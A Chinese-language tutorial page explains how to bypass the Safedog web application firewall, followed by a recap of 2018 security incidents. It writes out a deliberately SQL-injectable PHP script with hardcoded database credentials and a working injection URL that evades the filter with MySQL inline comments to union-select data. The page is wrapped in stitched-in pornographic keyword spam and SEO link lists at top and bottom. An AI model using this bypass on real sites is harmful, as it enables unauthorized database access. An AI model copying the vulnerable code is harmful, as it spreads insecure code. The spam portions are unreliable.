9久久伊人精品综合,亚洲一区精品视频在线,成 人免费va视频,国产一区二区三区黄网,99国产精品永久免费视频,亚洲毛片多多影院,精品久久久无码人妻中文字幕,无码国产欧美一区二区三区不卡
學習啦 > 學習電腦 > 電腦安全 > 網絡安全知識 >

如何繞過安全狗防護軟件

時間: 加城1195 分享

  網絡安全是目前互聯網的熱門話題之一,作為個人用戶的我們同樣需要關注,做好防護。安全狗是一款大家熟悉的服務器安全加固產品,據稱已經擁有50W的用戶量。最近經過一些研究,發現安全狗的一些防護功能,例如SQL注入、文件上傳、防webshell等都可以被繞過,下面為大家一一介紹。

  方法步驟

  本次測試環境為

  中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72

  網站安全狗IIS版3.2.08417

  SQL注入繞過

  我們先寫一個存在SQL注入漏洞的php:

  $uid = $_REQUEST['id'];

  if(!$conn = @mysql_connect("localhost", "root", "123456"))

  die('An Error Occured

  unable to connect to the database.');

  if(!@mysql_select_db("supe",$conn))

  die("An Error Occured

  unable to find it at database on your MySQL server.");

  $text = "select * from supe_members where uid=".$uid;

  $rs = mysql_query ($text,$conn);

  while($rom = mysql_fetch_array($rs))

  {

  echo $rom["username"];

  }

  ?>

  我用的是supesite的庫,可以看到這里是有明顯SQL注入漏洞的,當沒有安全狗的時候可以成功注入:

  當安裝安全狗之后,注入語句會被攔截:

  經過測試發現,安全狗這塊的匹配正則應該是\s+and這類的,所以只要想辦法去掉空格,用普通注釋/**/是不行的,安全狗也防了這塊。但是對內聯注釋/*!and*/這種不知道為什么安全狗沒有攔截。

  用下面語句成功繞過SQL注入過濾:

  http://192.168.200.115/inj.php?id=1/*!and*/1=2/*!union*//*!select*/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17

  有人說只有POST才可以,但是我測試最新版本的安全狗GET注入也是可以用這種方法繞過的。

  相關閱讀:2018網絡安全事件:

  一、英特爾處理器曝“Meltdown”和“Spectre漏洞”

  2018年1月,英特爾處理器中曝“Meltdown”(熔斷)和“Spectre” (幽靈)兩大新型漏洞,包括AMD、ARM、英特爾系統和處理器在內,幾乎近20年發售的所有設備都受到影響,受影響的設備包括手機、電腦、服務器以及云計算產品。這些漏洞允許惡意程序從其它程序的內存空間中竊取信息,這意味著包括密碼、帳戶信息、加密密鑰乃至其它一切在理論上可存儲于內存中的信息均可能因此外泄。

  二、GitHub 遭遇大規模 Memcached DDoS 攻擊

  2018年2月,知名代碼托管網站 GitHub 遭遇史上大規模 Memcached DDoS 攻擊,流量峰值高達1.35 Tbps。然而,事情才過去五天,DDoS攻擊再次刷新紀錄,美國一家服務提供商遭遇DDoS 攻擊的峰值創新高,達到1.7 Tbps!攻擊者利用暴露在網上的 Memcached 服務器進行攻擊。網絡安全公司 Cloudflare 的研究人員發現,截止2018年2月底,中國有2.5萬 Memcached 服務器暴露在網上 。

  三、蘋果 iOS iBoot源碼泄露

  2018年2月,開源代碼分享網站 GitHub(軟件項目托管平臺)上有人共享了 iPhone 操作系統的核心組件源碼,泄露的代碼屬于 iOS 安全系統的重要組成部分——iBoot。iBoot 相當于是 Windows 電腦的 BIOS 系統。此次 iBoot 源碼泄露可能讓數以億計的 iOS 設備面臨安全威脅。iOS 與 MacOS 系統開發者 Jonathan Levin 表示,這是 iOS 歷史上最嚴重的一次泄漏事件。

  四、韓國平昌冬季奧運會遭遇黑客攻擊

  2018年2月,韓國平昌冬季奧運會開幕式當天遭遇黑客攻擊,此次攻擊造成網絡中斷,廣播系統(觀眾不能正常觀看直播)和奧運會官網均無法正常運作,許多觀眾無法打印開幕式門票,最終未能正常入場。

  五、加密貨幣采礦軟件攻擊致歐洲廢水處理設施癱瘓

  2018年2月中旬,工業網絡安全企業 Radiflow 公司表示,發現四臺接入歐洲廢水處理設施運營技術網絡的服務器遭遇加密貨幣采礦惡意軟件的入侵。該惡意軟件直接拖垮了廢水處理設備中的 HMI 服務器 CPU,致歐洲廢水處理服務器癱瘓 。

  Radiflow 公司稱,此次事故是加密貨幣惡意軟件首次對關鍵基礎設施運營商的運營技術網絡展開攻擊。由于受感染的服務器為人機交互(簡稱HMI)設備,之所以導致廢水處理系統癱瘓,是因為這種惡意軟件會嚴重降低 HMI 的運行速度。


服務器安全相關文章:

1.服務器維護安全策略

2.服務器安全維護技巧

3.Linux 服務器提高安全性的技巧方法

4.有哪些方法可以提高Linux服務器安全性

5.教你如何配置自己的網站服務器

4040983 主站蜘蛛池模板: 华人在线亚洲欧美精品| 一本无码在线观看| 他掀开裙子把舌头伸进去添视频| 日本边添边摸边做边爱喷水| 无码中文字幕人妻在线一区| 精品亚洲没码中文字幕| 熟女视频一区二区三区嫩草| 国产精品视频午夜福利| 国产一区二区三区在线观看免费| 九九热免费精品视频在线| 亚洲欧美人成人综合在线播放| 国产精品爽黄69天堂A| 一区二区三区四区五区黄色| 日韩精品一区二区三区视频| 久久超碰色中文字幕超清| 亚洲午夜福利精品无码不卡| 女同AV在线播放| 国产女人18毛片水真多1| 久久亚洲人成网站| 国产精品成人午夜福利| 免费的特黄特色大片| 中文字幕一区二区久久综合| 国产精品久久无码不卡黑寡妇| 丰满少妇被猛烈进入av久久| 中文无码乱人伦中文视频在线| 人人妻人人狠人人爽天天综合网| 我国产码在线观看av哈哈哈网站 | 国产乱人伦偷精品视频下| 国产美熟女乱又伦AV果冻传媒| 亚洲一区二区三区18禁| 亚洲男人电影天堂无码| 久久精品国产热久久精品国产亚洲| 4hu四虎永久在线观看| 欧美不卡无线在线一二三区观 | 亚洲情综合五月天| 公喝错春药让我高潮| 人妻日韩人妻中文字幕| 国产草草影院ccyycom| 黑人巨大亚洲一区二区久| 纯肉高h啪动漫| 国语自产精品视频在线看|